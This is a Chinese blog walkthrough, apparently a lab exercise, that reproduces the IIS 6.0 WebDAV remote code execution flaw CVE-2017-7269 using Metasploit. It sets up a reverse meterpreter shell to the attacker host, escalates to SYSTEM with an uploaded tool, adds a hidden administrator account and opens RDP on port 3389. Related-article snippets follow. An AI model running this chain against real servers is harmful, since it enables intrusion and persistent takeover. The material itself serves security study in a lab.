bat 远程复制文件_iis6.0远程代码执行漏洞复现(CVE20177269)

最新推荐文章于 2024-08-17 19:44:44 发布
最新推荐文章于 2024-08-17 19:44:44 发布
阅读量388 收藏
点赞数
文章标签: bat 远程复制文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30800615/article/details/112096352
版权
本文介绍了如何复现并利用CVE-2017-7269漏洞进行远程代码执行。通过在Windows Server 2003 R2上的IIS6.0设置,利用Metasploit框架的模块,逐步设置参数并执行攻击。在获得一般用户权限后,通过上传和执行提权工具,最终达到系统权限,并开启目标机的3389端口,实现远程桌面连接。
摘要由CSDN通过智能技术生成

一.实验环境搭建

1.目标机:windows server 2003 r2

2.iis配置

目标机ip:192.168.0.102

二.攻击机器

一台kai liunx     ip:192.168.0.131

三.开始攻击

下载攻击exp,地址:

exp:https://github.com/zcgonvh/cve-2017-7269

1.把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下

2.打开Metasploit

3.输入use命令,use exploit/windows/iis/cve-2017-7269

4.使用命令show options

5.设置目标机ip,set RHOST 192.168.0.102

6.设置对面网站,set HttpHost 192.168.0.102

7.设置返回载荷,set payload windows/meterpreter/reverse_tcp

8.设置攻击机ip,set LHOST 192.168.0.131

9.进行溢出,exploit

10.如果出现错误Exploit completed, but no session was created,有可能是攻击的过多,可以尝试重启,实在不行就恢复快照

11.输入shell命令,来到了我们所熟悉的界面

12.查看当前用户权限,whoami,发现只是个一般用户权限

13.cd到c盘

14.来到c盘根目录,mkdir 123,进行新建文件夹,发现创建成功(实际情况不会这么简单,只能手工寻找权限较低的目录)

14.按Ctrl + C退出shell,输出y

15.利用Metasploit的上传功能,把提权工具pr1.exe上传到刚刚新建的文件里

16.又回到shell里面确定工具上传是否成功

17.利用工具进行提权,命令:pr1.exe "whoami",已经是system权限了

18.进行新建用户,pr1.exe "net user wcy wcy /add"

19.添加用户到管理员,pr1.exe "net localhost administrators wcy /add"

20.查看远程连接是否打开,没有打开,命令:netstat -an

21.再上传一个开3389.bat,利用pr1.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面pr1.exe上传方法一样)

命令:iis6.exe "3389.bat"

23.进行远程连接,本地cmd输入命令:mstsc

24.利用之前新建的管理员成功登录

范汝诗
关注
Web中间件常见安全漏洞总结
qq_40907977的博客
08-14 6750
IIS IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS目前只适用于Windows系统,不适用于其他操作系统。 解析漏洞 IIS 6.X 基于文件名 该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; 号及其后面的内容,相当于截断。 基于文件夹名 该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。 另外,IIS6.
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞iis服务提权工具。
iis6.0远程代码执行(CVE-2017-7269)
qq115399231的博客
08-06 929
环境搭建 使用windows server 2003 R2 下载安装iis,这里我没有挂载光盘,网上下的iis安装包(已经安装好了,放个图) 这里我加了个默认页面 配置iis服务 测试环境准备就绪 window server 2003(靶机):192.168.162.132 kali(攻击机):192.168.162.128 EXP利用 下载 把exp 复制到kali攻击机器的/usr/s...
LVS配置
最新发布
2302_77150007的博客
08-17 921
部署NAT模式集群案例实验环境主机名IPvip角色node1调度器(VSnode1真实服务器(RSnode1真实服务器(RSnode1测试机配置命令1.在node1中启用内核路由功能2.在node1中安装ipvsadm3.在node1中添加调度策略4.查看策略5.保存规则6.删除所有规则ipvsadm -C7.重载规则8.测试done9.修改权重测试效果done部署DR模式集群案例。
cve-2017-7269
qfslyy的博客
12-19 2379
CEV-2017-7269(过程,步骤,说明) 1、 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) (只是个人学习笔记) 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) 之后需要将包引入到msf中: 可以选择数据库方式,将cve包导入到msf中,也可以直接将包放在目录:/usr/share/metasploit-framework/modules/exploits/w
iis6-0 cve-2017-7269 批量验证脚本
ai74583的博客
04-01 410
代码地址 import subprocess f = open('ips.txt', 'r') flines = f.readlines() vulnsrvs = 0 i = 1 for line in flines: host = line.split(":") ip = host[0].replace('\n','') port = host[1]...
CVE-2017-7269(远程代码执行漏洞)
Picturej的博客
12-10 525
第一 iis 必须为6.0第二系统windows server2003msf框架使用cve-2017-7269如果没有的话,需要提前导入这个模块msfconsole配置相关信息进来发现权限很低需要进行提权发现了在c盘可以创建文件尝试上传文件来提权拿文件来提权查看当前用户权限,发现提权了。
Web渗透(六)文件上传漏洞
weixin_39157582的博客
09-21 1353
文件上传漏洞 https://www.secpulse.com/archives/116338.html
Web中间件常见安全漏洞
KHOST的博客
03-10 8426
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
iis6.0远程代码执行漏洞
G208_522的博客
11-20 3492
iis6.0远程代码执行漏洞 1、实验环境搭建 目标主机Windows server2003 sp2 2、目标服务器需要在IIS里面开启WebDAV 3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址) Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址) 4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下: k
cve-2017-7269远程代码执行漏洞复现
嗷空酒的博客
12-11 1230
cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的。IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2 可以稳定利用;
CVE-2017-7269渗透提权
zx66661的博客
12-27 1820
下载CVE2017-7269.ZIP文件解压放到kali下的 【/usr/share/metasploit-framework/modules/exploits/windows/iis】目录下 在kali下面启动MSF软件输入命令 msfconle use exploit/windows/iis/cve-2017-7269 设置 靶机ip 返回载荷 本机ip 端口8080 攻击成功 发现没有权限 所以权限是user权限是很低的,现在我们要进行提权操作 利用MSF的upload命令上传.
CVE-2017-7269-iis远程溢出漏洞复现
PANDA墨森的博客
06-19 665
##01漏洞描述 cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的。IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2 可以稳定利用。 下面开始复现cve_2017_7269漏洞,拿下windows 2003 R2权限,并远程登录服务器: ##02靶机实验环境 目标主机:Windows Server 2..
iis6.0cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
redwand的博客
05-04 1290
网上看到的iis6.0cve-2017-7269)的利用文章,要么只有远程利用不包含本地提权,要么包含本地提权却没有常见失败原因,故有此文 本篇文章面向有一点windows命令行基础,kali基础,msf基础的同学
复现CVE-2017-7269(过程,步骤,说明)
XZ_______的博客
12-20 3103
配置环境:Windows server 2003 靶机 kali2.0以上版本 前言:做实验之前要确定一下靶机与攻击主机可以互相通信 一、配置Windows server 2003 靶机 1、打开添加/删除windows程序点击添加/删除windows组件 2、安装iis6.0中间件: 3、打开iisiis中的webDAV改为允许 4、打开网站找到默认网站右击属性,将ip地址改为本机ip地址 这个时候呢我们的靶机已经配置完毕了,接下来我们来配置我们的kali 二、开启kali (第一次使用msfc
IIS6.0漏洞CVE-2017-7269 远程代码执行漏洞复现及Poc验证
7Riven's blog
12-06 3906
漏洞描述 CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行 漏洞产生的原因 在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...
IIsCVE-2017-7269漏洞复现#步骤详细
AKM4180的博客
12-19 409
机器准备: win2003、Kali 前提条件:
记录一次win提权
m0_52149675的博客
04-16 200
我看见第六章的传送门上写着大大的两个字--提权!! 在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。 进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下图。 因此我直接来到了菜刀,进入了文件管...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值